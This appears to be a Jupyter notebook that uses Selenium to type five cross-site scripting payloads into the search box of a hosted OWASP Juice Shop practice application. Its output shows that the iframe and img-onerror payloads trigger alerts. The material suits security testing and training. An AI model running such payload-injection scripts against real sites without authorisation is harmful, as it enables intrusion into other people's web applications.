In [4]:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time

url = "https://juice-shop.herokuapp.com"

# XSS payloads
xss_payloads = [
    '<iframe src="javascript:alert(`xss`)">',
    "';alert('XSS2');//",
    "<svg onload=alert(1)>",
    "<body onload=alert('xss')>",
    "<img src=x onerror=alert('XSS')>"
]


In [2]:
# Setup Chrome WebDriver
options = webdriver.ChromeOptions()
options.add_argument("--start-maximized")
driver = webdriver.Chrome(options=options)

vulnerable_payloads = []

def test_xss_payloads(driver, payloads):
    for payload in payloads:
        try:
            print(f"Testing payload: {payload}")
            # Navigate to the search box
            search_box = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, 'searchQuery')))
            search_box.click()

            input_field = WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'mat-input-0')))
            input_field.clear()
            input_field.send_keys(payload)
            input_field.send_keys(Keys.ENTER)

            time.sleep(1)

            try:
                # Increase the wait time to make sure alert appears
                alert = WebDriverWait(driver, 5).until(EC.alert_is_present())
                print(f"XSS vulnerability detected with payload: {payload}")
                alert.accept()
                vulnerable_payloads.append(payload)
            except:
                print(f"No XSS vulnerability detected with payload: {payload}")


        except Exception as e:
            print(f"Error occurred while testing payload: {payload}, Error: {e}")
            continue  # Continue with the next payload

try:
    driver.get(url)
    WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, ".close-dialog"))).click()

    test_xss_payloads(driver, xss_payloads)

finally:
    driver.quit()


Testing payload: <iframe src="javascript:alert(`xss`)">
XSS vulnerability detected with payload: <iframe src="javascript:alert(`xss`)">
Testing payload: ';alert('XSS2');//
No XSS vulnerability detected with payload: ';alert('XSS2');//
Testing payload: <svg onload=alert(1)>
No XSS vulnerability detected with payload: <svg onload=alert(1)>
Testing payload: <body onload=alert('xss')>
No XSS vulnerability detected with payload: <body onload=alert('xss')>
Testing payload: <img src=x onerror=alert('XSS')>
XSS vulnerability detected with payload: <img src=x onerror=alert('XSS')>


In [3]:
if vulnerable_payloads:
    print("Vulnerable XSS payloads detected:")
    for payload in vulnerable_payloads:
        print(payload)
else:
    print("No vulnerable XSS payloads detected.")

Vulnerable XSS payloads detected:
<iframe src="javascript:alert(`xss`)">
<img src=x onerror=alert('XSS')>
